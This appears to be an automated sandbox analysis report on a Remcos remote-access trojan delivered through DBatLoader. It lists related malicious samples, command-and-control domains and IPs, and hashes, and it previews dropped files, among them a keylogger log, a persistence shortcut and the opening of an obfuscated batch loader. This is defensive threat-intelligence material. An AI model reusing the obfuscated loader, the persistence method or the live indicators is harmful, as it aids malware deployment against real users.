                                                                                                                  Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  103.186.117.142HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      dual-spov-0006.spov-msedge.netFT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 13.107.137.11
                                                                                                                      oceansss.duckdns.orgHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 103.186.117.142
                                                                                                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 103.186.117.142
                                                                                                                      geoplugin.net1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      AARNET-AS-APAustralianAcademicandResearchNetworkAARNeHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 103.186.117.142
                                                                                                                      1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 103.183.144.35
                                                                                                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 103.186.117.142
                                                                                                                      W5xi2iuufC.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 103.169.166.27
                                                                                                                      jdsfl.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 134.115.167.10
                                                                                                                      jdsfl.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 150.203.163.71
                                                                                                                      SocUwyIjOh.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 157.85.230.5
                                                                                                                      tajma.arm7-20240421-1854.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 103.174.73.190
                                                                                                                      tajma.x86-20240421-1853.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 103.174.73.190
                                                                                                                      cfGjk0Keob.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 103.171.246.120
                                                                                                                      ATOM86-ASATOM86NL1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSPayment MT103.xlsGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.69
                                                                                                                      Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.213.69
                                                                                                                      FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 40.67.232.186
                                                                                                                      OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.208.16.94
                                                                                                                      SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                      • 13.107.213.69
                                                                                                                      https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.107.213.69
                                                                                                                      https://uqgekpc20qn1.azureedge.net/6466/Get hashmaliciousTechSupportScamBrowse
                                                                                                                      • 13.107.213.69
                                                                                                                      https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                      • 13.89.178.26
                                                                                                                      https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.136.10

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      z56NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.139.11
                                                                                                                      iPUk65i3yI.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.139.11

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\ProgramData\Remcos\remcos.exeHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                        payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          C:\Users\Public\Libraries\Cmzcxhwn.PIFHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                              C:\Users\Public\Libraries\easinvoker.exeFT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                  payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                    VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                      SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                        Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                              XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\ProgramData\Remcos\remcos.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                  Entropy (8bit):7.422807171812134
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
                                                                                                                                                  MD5:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  SHA1:101B5F991A26FC9213C4445BD9BFDB87A6A6C5CB
                                                                                                                                                  SHA-256:E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                                                                                                                                                  SHA-512:CD6B9CD996C3BCA3AA0BE5D0CEBEBB7DB1701878D5C62354D6DF4C880D4AF8007C95BAF7F0AC9E75B099C7B3573DC23AFA3A872213A9963B84C86028E6969959
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                                                  • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                  C:\ProgramData\Remcos\remcos.exe:Zone.Identifier

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                  C:\ProgramData\fgdghrd\logs.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):588
                                                                                                                                                  Entropy (8bit):3.3799064913996024
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6lPKecFb5SpE/WFe5BWFe5BWFe5BWFe5BWItN25MMl:6ZcpYE/WqBWqBWqBWqBWIt/Ml
                                                                                                                                                  MD5:1B45D31EEAF80B8A2AD9746AA274CE3D
                                                                                                                                                  SHA1:9C37206D10732478017FB2A08A64700480DCE58A
                                                                                                                                                  SHA-256:2C47299E573335BC16DF22DBEE1D85A9A88AC58FD7DB7E8E2D830BBB6B2D5813
                                                                                                                                                  SHA-512:24F9A90F64D5D4EDDF4EC217BEAB33161BF30FB832A8E6377939A6F51367B74E7669638C98A2D1577DF2490E7F9C856A5CE5D91A740F25B5215FC90B0C195E35
                                                                                                                                                  Malicious:true
                                                                                                                                                  Yara Hits:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\fgdghrd\logs.dat, Author: Joe Security
                                                                                                                                                  Preview:....[.2.0.2.4./.0.4./.2.4. .0.7.:.2.0.:.3.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.R.e.m.c.o.s.\.r.e.m.c.o.s...e.x.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                  C:\Users\Public\Cmzcxhwn.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):100
                                                                                                                                                  Entropy (8bit):5.076405505932685
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMmuTsb6cyoOovn:HRYFVmTWDyzSTE3yoOy
                                                                                                                                                  MD5:72C05F885ED3056C0DF8281254BAE799
                                                                                                                                                  SHA1:BE669321E3F9606DB8BE8FFB42BD0CA16597EA7B
                                                                                                                                                  SHA-256:F4FB38198E6FC7C2B2C07D0B0EC8968803FBD433FD19962A543A891C25EF24DB
                                                                                                                                                  SHA-512:E7FFB220E711DAA9F4C4AB827DBDDB31B75466283E9787B10D794ADCA4445490DA13E3957911EA03BB3A048BB6A6E382A329DA71FE02A6908FA6B0CB7DEE7A99
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF"..IconIndex=29..HotKey=25..

                                                                                                                                                  C:\Users\Public\Libraries\Cmzcxhwn

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):838832
                                                                                                                                                  Entropy (8bit):7.166482987551088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:I8ipI/oJsWu16ZmsSgSmmPIQwjkH8fvvkKGVmfSpEiEhMfHU0MlXk5:Ini/K9tSmmPVwjkcmu2EIHxMlXS
                                                                                                                                                  MD5:6DBB10D6B60E1A87F5F5346685AA9E81
                                                                                                                                                  SHA1:516A19B05660C0F80208B85FA0FCF60B8E2F86A5
                                                                                                                                                  SHA-256:5A863615FE982204BFC576576DFC7C5A06C1DDB029ACF1EC7F37F79541ABE750
                                                                                                                                                  SHA-512:FF6028B2D925241F371D5775D0FBFA516795552E0A7526C69A372D071C5A0133F51E9B6D014A9364370573C3A9910CDC14935AC80BAE12A3E6F0262E484BF185
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa1-$650102/7$5+'*5+63<1,5*7;354,,::67;3=+35&$&3(&-7(.$4.=%%$9;4;9$:7=%;7.,-=-4,545<5'7+8;(;%1%4</&8&5.:&5$,(<=,-:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBad0=&;+:143/KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa...........(..D[...G.!a<.X.e?f.......jT..].X.cB4.M.9..2.G.q.2<...:..4.C*........F.F.;K..._{Z..[`..#....;7.O......<U..W.$..)..0..=.'....qB.U.c.<B.p8>..'.[..2N.<1.D..q-......Y9...T.1T.....?..\(......?..9;....TDT.b.`."Yc.9..8.L..*e.....3.....<.f*=..7.?.F./....?1../j.-cG./..q-d.'8.a.<...q.i::.....q.V.6D.0+.8&WZ.g[....,...O+........AD..`.E.*.'6.[..8...*..n.7..7.A......./R.Y.9.B...10.J.A..dO>.^.A.*.q.eOq...DW.l..p6..&5..+1.M.'.....G...B..I.K.-.../...I..&..$S...q..?...=.J..T......[FX..D.(a/.%.T..#...b.....e?o....:.a0+eK..7.!E.'L..L.'].....nN..P...U&'E..$.#(.....2..8.....%=......DR....'.]./.))..*._.9.>.4.,.T.1.p....lV.8...$:.....V......=5V.1.7.......!......T/.....(..I...].:....K.J.X.2.q.G.:.kN<.).eE:...d0?...LQ..W...........2..F.(....

                                                                                                                                                  C:\Users\Public\Libraries\Cmzcxhwn.PIF

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                  Entropy (8bit):7.422807171812134
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
                                                                                                                                                  MD5:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  SHA1:101B5F991A26FC9213C4445BD9BFDB87A6A6C5CB
                                                                                                                                                  SHA-256:E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                                                                                                                                                  SHA-512:CD6B9CD996C3BCA3AA0BE5D0CEBEBB7DB1701878D5C62354D6DF4C880D4AF8007C95BAF7F0AC9E75B099C7B3573DC23AFA3A872213A9963B84C86028E6969959
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                                                  • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                  C:\Users\Public\Libraries\CmzcxhwnO.bat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30026
                                                                                                                                                  Entropy (8bit):3.9380000056299878
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                                                                                  MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                                                                                  SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                                                                                  SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                                                                                  SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Yara Hits:
                                                                                                                                                  • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, Author: ditekSHen
                                                                                                                                                  Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                                                                                  C:\Users\Public\Libraries\Null

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4
                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:K:K
                                                                                                                                                  MD5:C76F4263837A36D85C6503D15252058C
                                                                                                                                                  SHA1:7E49F1F05AD3FBD95F696875635140006430C437
                                                                                                                                                  SHA-256:4410E1233468A479D21F029A0832B94FDD3A0BFB1300266EE5EA62D81AA371C8
                                                                                                                                                  SHA-512:5D1795C6D11CE5F3BBBB224C483862F5D8FA9CEFF1384ACEA179E5780E183924B01690F7855A958903DE060D7A1FA5857A15F2077FB3D3C5ADC7CAA859DFA9C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:66..

                                                                                                                                                  C:\Users\Public\Libraries\aaa.bat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3646
                                                                                                                                                  Entropy (8bit):5.383959173452972
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                                                  MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                                                  SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                                                  SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                                                  SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                                                  Malicious:false
